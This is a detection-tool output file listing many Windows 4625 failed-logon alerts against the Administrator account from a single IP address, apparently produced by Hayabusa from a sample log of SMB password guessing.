01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: 
